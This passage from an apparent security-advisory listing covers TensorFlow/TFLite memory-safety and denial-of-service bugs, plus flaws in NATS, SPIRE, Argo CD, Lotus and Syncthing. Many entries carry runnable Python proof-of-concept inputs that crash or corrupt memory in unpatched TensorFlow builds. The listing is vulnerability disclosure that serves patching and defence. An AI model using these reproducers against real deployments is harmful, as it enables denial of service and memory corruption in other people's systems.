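tf.raw_ops.SparseMatrixSparseCholesky(
    input=input, permutation=permutation, type=tf.float32)
```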

Invalid validation in `QuantizeAndDequantizeV2`

The validation in tf.raw_ops.QuantizeAndDequantizeV2 allows invalid values for the axis argument; see the reproducer below.
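
The advisory's reproducer as a script:

```python
import tensorflow as tf

input_tensor = tf.constant([0.0], shape=[1], dtype=float)
input_min = tf.constant(-10.0)
input_max = tf.constant(-10.0)

# axis=-2 is accepted even though it is not a valid axis for a 1-D input.
tf.raw_ops.QuantizeAndDequantizeV2(
    input=input_tensor, input_min=input_min, input_max=input_max,
    signed_input=False, num_bits=1, range_given=False,
    round_mode='HALF_TO_EVEN', narrow_range=False, axis=-2)
```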

Interpreter crash from `tf.io.decode_raw`

The implementation of tf.io.decode_raw produces incorrect results and crashes the Python interpreter when combining fixed_length and wider datatypes; see the reproducer below.
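
The reproducer from the advisory:

```python
import tensorflow as tf

# fixed_length=4 bytes combined with the wider 2-byte uint16 dtype triggers the bug.
tf.io.decode_raw(tf.constant(["1", "2", "3", "4"]), tf.uint16, fixed_length=4)
```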

Integer overflow in TFLite memory allocation

The TFLite code for allocating TFLiteIntArrays is vulnerable to an integer overflow issue: int TfLiteIntArrayGetSizeInBytes(int size) { static TfLiteIntArray dummy; return sizeof(dummy) + sizeof(dummy.data[0]) * size; } An attacker can craft a model such that the size multiplier is so large that the return value overflows the int datatype and becomes negative. In turn, this results in an invalid value being given to malloc: TfLiteIntArray* TfLiteIntArrayCreate(int size) { TfLiteIntArray* ret = …

Integer overflow in TFLite concatenation

The TFLite implementation of concatenation is vulnerable to an integer overflow issue: for (int d = 0; d < t0->dims->size; ++d) { if (d == axis) { sum_axis += t->dims->data[axis]; } else { TF_LITE_ENSURE_EQ(context, t->dims->data[d], t0->dims->data[d]); } } An attacker can craft a model such that the dimensions of one of the concatenation inputs overflow the values of int. TFLite uses int to represent tensor dimensions, whereas TF uses int64. …

Incorrect handling of credential expiry by NATS Server

(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-26892.txt ) Problem Description NATS nats-server through 2020-10-07 has Incorrect Access Control because of how expired credentials are handled. The NATS accounts system has expiration timestamps on credentials; the https://github.com/nats-io/jwt library had an API which encouraged misuse and an IsRevoked() method which misused its own API. A new IsClaimRevoked() method has correct handling and the nats-server has been updated to use this. The old IsRevoked() method …

Incorrect handling of credential expiry by /nats-io/nats-server

(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-26892.txt ) Problem Description NATS nats-server through 2020-10-07 has Incorrect Access Control because of how expired credentials are handled. The NATS accounts system has expiration timestamps on credentials; the https://github.com/nats-io/jwt library had an API which encouraged misuse and an IsRevoked() method which misused its own API. A new IsClaimRevoked() method has correct handling and the nats-server has been updated to use this. The old IsRevoked() method …

Incorrect Default Permissions

A privilege escalation vulnerability impacting the Google Exposure Notification Verification Server (versions prior to 0.23.1), allows an attacker who (1) has UserWrite permissions and (2) is using a carefully crafted request or malicious proxy, to create another user with higher privileges than their own. This occurs due to insufficient checks on the allowed set of permissions. The new user creation event would be captured in the Event Log.

Incorrect Calculation of Buffer Size

TensorFlow is an end-to-end open source platform for machine learning. An attacker can trigger a denial of service via a CHECK-fail in converting sparse tensors to CSR Sparse matrices. This is because the implementation does a double redirection to access an element of an array allocated on the heap. If the value at indices + 1 is outside the bounds of csr_row_ptr, this results in writing outside of bounds of …

Incomplete validation in `tf.raw_ops.CTCLoss`

Incomplete validation in tf.raw_ops.CTCLoss allows an attacker to trigger an OOB read from the heap, as shown in the reproducer below. An attacker can also trigger a heap buffer overflow: import tensorflow as tf inputs = tf.constant([], shape=[7, 2, …
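
The first reproducer (the OOB read), runnable against an affected TensorFlow build:

```python
import tensorflow as tf

inputs = tf.constant([], shape=[10, 16, 0], dtype=tf.float32)
labels_indices = tf.constant([], shape=[8, 0], dtype=tf.int64)
# Negative label values and sequence lengths are part of the crafted input.
labels_values = tf.constant([-100] * 8, shape=[8], dtype=tf.int32)
sequence_length = tf.constant([-100] * 16, shape=[16], dtype=tf.int32)

tf.raw_ops.CTCLoss(
    inputs=inputs, labels_indices=labels_indices, labels_values=labels_values,
    sequence_length=sequence_length, preprocess_collapse_repeated=True,
    ctc_merge_repeated=False, ignore_longer_outputs_than_inputs=True)
```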

Incomplete validation in `SparseReshape`

Incomplete validation in SparseReshape results in a denial of service based on a CHECK-failure; see the reproducer below.
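
The advisory's reproducer as a script:

```python
import tensorflow as tf

# The index value 41 is inconsistent with the all-zero input shape.
input_indices = tf.constant(41, shape=[1, 1], dtype=tf.int64)
input_shape = tf.zeros([11], dtype=tf.int64)
new_shape = tf.zeros([1], dtype=tf.int64)

tf.raw_ops.SparseReshape(
    input_indices=input_indices, input_shape=input_shape, new_shape=new_shape)
```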

Incomplete validation in `SparseAdd`

Incomplete validation in SparseAdd allows attackers to exploit undefined behavior (dereferencing null pointers) as well as to write outside the bounds of heap allocated data; see the reproducer below.
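
The reproducer from the advisory, as a runnable script:

```python
import tensorflow as tf

# The shape tensors are empty, so they do not describe the indices/values at all.
a_indices = tf.zeros([10, 97], dtype=tf.int64)
a_values = tf.zeros([10], dtype=tf.int64)
a_shape = tf.zeros([0], dtype=tf.int64)
b_indices = tf.zeros([0, 0], dtype=tf.int64)
b_values = tf.zeros([0], dtype=tf.int64)
b_shape = tf.zeros([0], dtype=tf.int64)

tf.raw_ops.SparseAdd(
    a_indices=a_indices, a_values=a_values, a_shape=a_shape,
    b_indices=b_indices, b_values=b_values, b_shape=b_shape, thresh=0)
```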

Improper Verification of Cryptographic Signature

Lotus is an Implementation of the Filecoin protocol written in Go. BLS signature validation in lotus uses blst library method VerifyCompressed. This method accepts signatures in 2 forms: "serialized", and "compressed", meaning that BLS signatures can be provided as either of 2 unique byte arrays. Lotus block validation functions perform a uniqueness check on provided blocks. Two blocks are considered distinct if the CIDs of their blockheader do not match. …

Improper Input Validation

Syncthing is a continuous file synchronization program. In Syncthing before version 1.15.0, the relay server strelaysrv can be caused to crash and exit by sending a relay message with a negative length field. Similarly, Syncthing itself can crash for the same reason if given a malformed message from a malicious relay server when attempting to join the relay. Relay joins are essentially random (from a subset of low latency relays) …

Improper Check for Unusual or Exceptional Conditions

TensorFlow is an end-to-end open source platform for machine learning. An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.QuantizeAndDequantizeV4Grad. This is because the implementation does not validate the rank of the input_* tensors. In turn, this results in the tensors being passed as they are to QuantizeAndDequantizePerChannelGradientImpl. However, the vec<T> method requires the rank to be 1 and triggers a CHECK failure otherwise. The fix will be …

Improper Certificate Validation

In SPIRE 0.8.1 through 0.8.4 and before versions 0.9.4, 0.10.2, 0.11.3 and 0.12.1, specially crafted requests to the FetchX509SVID RPC of SPIRE Server’s Legacy Node API can result in the possible issuance of an X.509 certificate with a URI SAN for a SPIFFE ID that the agent is not authorized to distribute. Proper controls are in place to require that the caller presents a valid agent certificate that is already …

Import token permissions checking not enforced

(This advisory is canonically https://advisories.nats.io/CVE/CVE-2021-3127.txt) Problem Description The NATS server provides for Subjects which are namespaced by Account; all Subjects are supposed to be private to an account, with an Export/Import system used to grant cross-account access to some Subjects. Some Exports are public, such that anyone can import the relevant subjects, and some Exports are private, such that the Import requires a token JWT to prove permission. The JWT …

Import of incorrectly embargoed keys could cause early publication

Impact If your installation is using the export-importer service, there is potential impact. If your installation is not importing keys via the export-importer services, your installation is not impacted. In versions 0.19.1 and earlier, the export-importer service assumed that the server it was importing from had properly embargoed keys for at least 2 hours after their expiry time. There are now known instances of servers that did not properly embargo …

Import loops in account imports, nats-server DoS

(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-28466.txt) Problem Description An export/import cycle between accounts could crash the nats-server, after consuming CPU and memory. This issue was fixed publicly in https://github.com/nats-io/nats-server/pull/1731 in November 2020. The need to call this out as a security issue was highlighted by snyk.io and we are grateful for their assistance in doing so. Organizations which run a NATS service providing access to accounts run by untrusted third parties …

Helm OCI credentials leaked into Argo CD logs

Impact When Argo CD was connected to a Helm OCI repository with authentication enabled, the credentials used for accessing the remote repository were logged. Anyone with access to the pod logs - either via access with appropriate permissions to the Kubernetes control plane or a third party log management system where the logs from Argo CD were aggregated - could have potentially obtained the credentials to the Helm OCI repository. …

Heap out of bounds write in `RaggedBinCount`

If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow; see the reproducer below.
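
The reproducer from the advisory, as a runnable script:

```python
import tensorflow as tf

# splits does not describe a valid SparseTensor (ragged row splits start at 0).
tf.raw_ops.RaggedBincount(
    splits=[7, 8],
    values=[5, 16, 51, 76, 29, 27, 54, 95],
    size=59,
    weights=[0, 0, 0, 0, 0, 0, 0, 0],
    binary_output=False)
```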

Heap out of bounds read in `RequantizationRange`

The implementation of tf.raw_ops.RequantizationRange can cause reads outside of bounds of heap allocated data if an attacker supplies specially crafted inputs; see the reproducer below.
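
The advisory's reproducer as a script:

```python
import tensorflow as tf

input = tf.constant([1], shape=[1], dtype=tf.qint32)
# input_min and input_max are empty tensors with no backing data.
input_max = tf.constant([], dtype=tf.float32)
input_min = tf.constant([], dtype=tf.float32)

tf.raw_ops.RequantizationRange(input=input, input_min=input_min, input_max=input_max)
```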

Heap out of bounds read in `MaxPoolGradWithArgmax`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if an attacker supplies specially crafted inputs; see the reproducer below.
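
The reproducer from the advisory, as a runnable script:

```python
import tensorflow as tf

input = tf.constant([10.0, 10.0, 10.0], shape=[1, 1, 3, 1], dtype=tf.float32)
grad = tf.constant([10.0, 10.0, 10.0, 10.0], shape=[1, 1, 1, 4], dtype=tf.float32)
# argmax has far fewer elements than grad.
argmax = tf.constant([1], shape=[1], dtype=tf.int64)

tf.raw_ops.MaxPoolGradWithArgmax(
    input=input, grad=grad, argmax=argmax,
    ksize=[1, 1, 1, 1], strides=[1, 1, 1, 1],
    padding='SAME', include_batch_in_index=False)
```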

Heap out of bounds in `QuantizedBatchNormWithGlobalNormalization`

An attacker can cause a segfault and denial of service by accessing data outside the bounds of heap-allocated buffers in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization: import tensorflow as tf t = tf.constant([1], shape=[1, 1, 1, 1], dtype=tf.quint8) t_min = tf.constant([], shape=[0], dtype=tf.float32) t_max = tf.constant([], shape=[0], dtype=tf.float32) m = tf.constant([1], shape=[1], dtype=tf.quint8) m_min = tf.constant([], shape=[0], dtype=tf.float32) m_max = tf.constant([], shape=[0], dtype=tf.float32) v = tf.constant([1], shape=[1], dtype=tf.quint8) v_min = tf.constant([], shape=[0], dtype=tf.float32) v_max = tf.constant([], shape=[0], dtype=tf.float32) …

Heap OOB write in TFLite

A specially crafted TFLite model could trigger an OOB write on the heap in the TFLite implementation of ArgMin/ArgMax: TfLiteIntArray* output_dims = TfLiteIntArrayCreate(NumDimensions(input) - 1); int j = 0; for (int i = 0; i < NumDimensions(input); ++i) { if (i != axis_value) { output_dims->data[j] = SizeOfDimension(input, i); ++j; } } If axis_value is not a value between 0 and NumDimensions(input), then the condition in the if is never false (the body executes on every iteration), so …

Heap OOB read in TFLite

A specially crafted TFLite model could trigger an OOB read on the heap in the TFLite implementation of Split_V: const int input_size = SizeOfDimension(input, axis_value); If axis_value is not a value between 0 and NumDimensions(input), then the SizeOfDimension function will access data outside the bounds of the tensor shape array: inline int SizeOfDimension(const TfLiteTensor* t, int dim) { return t->dims->data[dim]; }

Heap OOB read in `tf.raw_ops.Dequantize`

Due to lack of validation in tf.raw_ops.Dequantize, an attacker can trigger a read from outside of bounds of heap allocated data: import tensorflow as tf input_tensor=tf.constant( [75, 75, 75, 75, -6, -9, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, …

Heap OOB in `QuantizeAndDequantizeV3`

An attacker can read data outside the bounds of a heap-allocated buffer in tf.raw_ops.QuantizeAndDequantizeV3.
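The advisory's proof of concept, reformatted as a runnable snippet (comments added); on an unpatched TensorFlow build it triggers the out-of-bounds read described above:

```python
import tensorflow as tf

# axis=3 is outside the rank of the input, which leads to the out-of-bounds read
tf.raw_ops.QuantizeAndDequantizeV3(
    input=[2.5, 2.5], input_min=[0, 0], input_max=[1, 1], num_bits=[30],
    signed_input=False, range_given=False, narrow_range=False, axis=3)
```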

Heap OOB and null pointer dereference in `RaggedTensorToTensor`

Due to a lack of validation in tf.raw_ops.RaggedTensorToTensor, an attacker can trigger undefined behavior if input arguments are empty.
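The proof of concept from the advisory, reformatted for readability (comments added); it is only expected to crash an affected, unpatched TensorFlow build:

```python
import tensorflow as tf

# an empty values tensor combined with crafted row partitions
shape = tf.constant([-1, -1], shape=[2], dtype=tf.int64)
values = tf.constant([], shape=[0], dtype=tf.int64)
default_value = tf.constant(404, dtype=tf.int64)
row = tf.constant([269, 404, 0, 0, 0, 0, 0], shape=[7], dtype=tf.int64)
rows = [row]
types = ['ROW_SPLITS']

tf.raw_ops.RaggedTensorToTensor(
    shape=shape, values=values, default_value=default_value,
    row_partition_tensors=rows, row_partition_types=types)
```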

Heap OOB access in unicode ops

An attacker can access data outside the bounds of a heap-allocated array in tf.raw_ops.UnicodeEncode.
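The advisory's reproduction, laid out as a runnable snippet (comments added); it only triggers the out-of-bounds access on an unpatched TensorFlow release:

```python
import tensorflow as tf

# split offsets that do not index into the single-element input_values
input_values = tf.constant([58], shape=[1], dtype=tf.int32)
input_splits = tf.constant([[81, 101, 0]], shape=[3], dtype=tf.int32)
output_encoding = "UTF-8"

tf.raw_ops.UnicodeEncode(
    input_values=input_values, input_splits=input_splits,
    output_encoding=output_encoding)
```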

Heap OOB access in `Dilation2DBackpropInput`

An attacker can write outside the bounds of heap-allocated arrays by passing invalid arguments to tf.raw_ops.Dilation2DBackpropInput.
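The advisory's proof of concept, reformatted as a runnable snippet (comments added); on an unpatched TensorFlow build it triggers the out-of-bounds write described above:

```python
import tensorflow as tf

input_tensor = tf.constant([1.1] * 81, shape=[3, 3, 3, 3], dtype=tf.float32)
# an empty filter tensor combined with the strides/rates below
filter = tf.constant([], shape=[0, 0, 3], dtype=tf.float32)
out_backprop = tf.constant([1.1] * 1062, shape=[3, 2, 59, 3], dtype=tf.float32)

tf.raw_ops.Dilation2DBackpropInput(
    input=input_tensor, filter=filter, out_backprop=out_backprop,
    strides=[1, 40, 1, 1], rates=[1, 56, 56, 1], padding='VALID')
```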

Heap buffer overflow in `StringNGrams`

An attacker can cause a heap buffer overflow by passing crafted inputs to tf.raw_ops.StringNGrams: import tensorflow as tf separator = b'\x02\x00' ngram_widths = [7, 6, 11] left_pad = b'\x7f\x7f\x7f\x7f\x7f' right_pad = b'\x7f\x7f\x25\x5d\x53\x74' pad_width = 50 preserve_short_sequences = True l = ['', '', '', '', '', '', '', '', '', '', ''] data = tf.constant(l, shape=[11], dtype=tf.string) l2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …

Heap buffer overflow in `SparseTensorToCSRSparseMatrix`

An attacker can trigger a denial of service via a CHECK-failure when converting sparse tensors to CSR sparse matrices.
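The proof of concept from the advisory, reformatted for readability (comments added); on an unpatched TensorFlow build it aborts the process via the CHECK-failure described above:

```python
import tensorflow as tf
import numpy as np
from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops

# a non-empty index for a sparse tensor whose dense_shape is 0 x 0
indices_array = np.array([[0, 0]])
value_array = np.array([0.0], dtype=np.float32)
dense_shape = [0, 0]
st = tf.SparseTensor(indices_array, value_array, dense_shape)

values_tensor = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix(
    st.indices, st.values, st.dense_shape)
```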

Heap buffer overflow in `SparseSplit`

An attacker can cause a heap buffer overflow in tf.raw_ops.SparseSplit.
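The advisory's reproduction, laid out as a runnable snippet (comments added); it only triggers the overflow on an unpatched TensorFlow release:

```python
import tensorflow as tf

# crafted sparse-tensor components taken from the advisory's report
shape_dims = tf.constant(0, dtype=tf.int64)
indices = tf.ones([1, 1], dtype=tf.int64)
values = tf.ones([1], dtype=tf.int64)
shape = tf.ones([1], dtype=tf.int64)

tf.raw_ops.SparseSplit(
    split_dim=shape_dims, indices=indices, values=values, shape=shape,
    num_split=1)
```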

Heap buffer overflow in `RaggedTensorToTensor`

An attacker can cause a heap buffer overflow in tf.raw_ops.RaggedTensorToTensor: import tensorflow as tf shape = tf.constant([10, 10], shape=[2], dtype=tf.int64) values = tf.constant(0, shape=[1], dtype=tf.int64) default_value = tf.constant(0, dtype=tf.int64) l = [849, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …

Heap buffer overflow in `RaggedBinCount`

If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow.
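The advisory's proof of concept, reformatted as a runnable snippet (comments added); on an unpatched TensorFlow build it triggers the heap buffer overflow described above:

```python
import tensorflow as tf

# splits=[0] provides no row ends for the five values
tf.raw_ops.RaggedBincount(
    splits=[0], values=[1, 1, 1, 1, 1], size=5,
    weights=[1, 2, 3, 4], binary_output=False)
```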

Heap buffer overflow in `QuantizedResizeBilinear`

An attacker can cause a heap buffer overflow in QuantizedResizeBilinear by passing in invalid thresholds for the quantization.
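The proof of concept from the advisory, reformatted for readability (comments added); it is only expected to crash an affected, unpatched TensorFlow build:

```python
import tensorflow as tf

# empty images and size tensors with empty quantization thresholds
images = tf.constant([], shape=[0], dtype=tf.qint32)
size = tf.constant([], shape=[0], dtype=tf.int32)
min = tf.constant([], dtype=tf.float32)
max = tf.constant([], dtype=tf.float32)

tf.raw_ops.QuantizedResizeBilinear(
    images=images, size=size, min=min, max=max,
    align_corners=False, half_pixel_centers=False)
```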

Heap buffer overflow in `QuantizedReshape`

An attacker can cause a heap buffer overflow in QuantizedReshape by passing in invalid thresholds for the quantization.
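The advisory's reproduction, laid out as a runnable snippet (comments added); it only triggers the overflow on an unpatched TensorFlow release:

```python
import tensorflow as tf

# every input, including the quantization thresholds, is an empty tensor
tensor = tf.constant([], dtype=tf.qint32)
shape = tf.constant([], dtype=tf.int32)
input_min = tf.constant([], dtype=tf.float32)
input_max = tf.constant([], dtype=tf.float32)

tf.raw_ops.QuantizedReshape(
    tensor=tensor, shape=shape, input_min=input_min, input_max=input_max)
```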

Heap buffer overflow in `QuantizedMul`

An attacker can cause a heap buffer overflow in QuantizedMul by passing in invalid thresholds for the quantization.
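The advisory's proof of concept, reformatted as a runnable snippet (comments added); on an unpatched TensorFlow build it triggers the overflow described above:

```python
import tensorflow as tf

x = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8)
y = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8)
# empty min/max quantization thresholds for both operands
min_x = tf.constant([], dtype=tf.float32)
max_x = tf.constant([], dtype=tf.float32)
min_y = tf.constant([], dtype=tf.float32)
max_y = tf.constant([], dtype=tf.float32)

tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x,
                        min_y=min_y, max_y=max_y)
```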

Heap buffer overflow in `MaxPoolGrad`

The implementation of tf.raw_ops.MaxPoolGrad is vulnerable to a heap buffer overflow.
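The proof of concept from the advisory, reformatted for readability (comments added); it is only expected to crash an affected, unpatched TensorFlow build:

```python
import tensorflow as tf

orig_input = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32)
orig_output = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32)
# an empty gradient tensor, inconsistent with orig_input / orig_output
grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)
ksize = [1, 1, 1, 1]
strides = [1, 1, 1, 1]
padding = "SAME"

tf.raw_ops.MaxPoolGrad(
    orig_input=orig_input, orig_output=orig_output, grad=grad,
    ksize=ksize, strides=strides, padding=padding, explicit_paddings=[])
```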

Heap buffer overflow in `MaxPool3DGradGrad`

The implementation of tf.raw_ops.MaxPool3DGradGrad is vulnerable to a heap buffer overflow: import tensorflow as tf values = [0.01] * 11 orig_input = tf.constant(values, shape=[11, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, …

Heap buffer overflow in `FractionalAvgPoolGrad`

The implementation of tf.raw_ops.FractionalAvgPoolGrad is vulnerable to a heap buffer overflow.
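The advisory's reproduction, laid out as a runnable snippet (comments added); it only triggers the overflow on an unpatched TensorFlow release:

```python
import tensorflow as tf

# crafted pooling arguments taken from the advisory's report
orig_input_tensor_shape = tf.constant([1, 3, 2, 3], shape=[4], dtype=tf.int64)
out_backprop = tf.constant([2], shape=[1, 1, 1, 1], dtype=tf.int64)
row_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64)
col_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64)

tf.raw_ops.FractionalAvgPoolGrad(
    orig_input_tensor_shape=orig_input_tensor_shape, out_backprop=out_backprop,
    row_pooling_sequence=row_pooling_sequence,
    col_pooling_sequence=col_pooling_sequence, overlapping=False)
```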

Heap buffer overflow in `Conv3DBackprop*`

Missing validation between arguments to tf.raw_ops.Conv3DBackprop* operations can result in heap buffer overflows: import tensorflow as tf input_sizes = tf.constant([1, 1, 1, 1, 2], shape=[5], dtype=tf.int32) filter_tensor = tf.constant([734.6274508233133, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0], shape=[4, 1, 6, 1, 1], dtype=tf.float32) out_backprop = tf.constant([-10.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, …

Heap buffer overflow in `Conv2DBackpropFilter`

An attacker can cause a heap buffer overflow to occur in Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([386.078431372549, 386.07843139643234], shape=[1, 1, 1, 2], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([386.078431372549], shape=[1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter( input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 66, 49, 1], use_cudnn_on_gpu=True, padding='VALID', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1] ) Alternatively, passing empty tensors also results in similar behavior: import tensorflow as …

Heap buffer overflow in `BandedTriangularSolve`

An attacker can trigger a heap buffer overflow in the Eigen implementation of tf.raw_ops.BandedTriangularSolve.
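The advisory's proof of concept, reformatted as a runnable snippet (comments added); on an unpatched TensorFlow build it triggers the heap buffer overflow described above:

```python
import tensorflow as tf
import numpy as np

# an empty banded matrix (shape 0 x 1) paired with a non-empty right-hand side
matrix_array = np.array([])
matrix_tensor = tf.convert_to_tensor(np.reshape(matrix_array, (0, 1)),
                                     dtype=tf.float32)
rhs_array = np.array([1, 1])
rhs_tensor = tf.convert_to_tensor(np.reshape(rhs_array, (1, 2)),
                                  dtype=tf.float32)

tf.raw_ops.BandedTriangularSolve(matrix=matrix_tensor, rhs=rhs_tensor)
```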
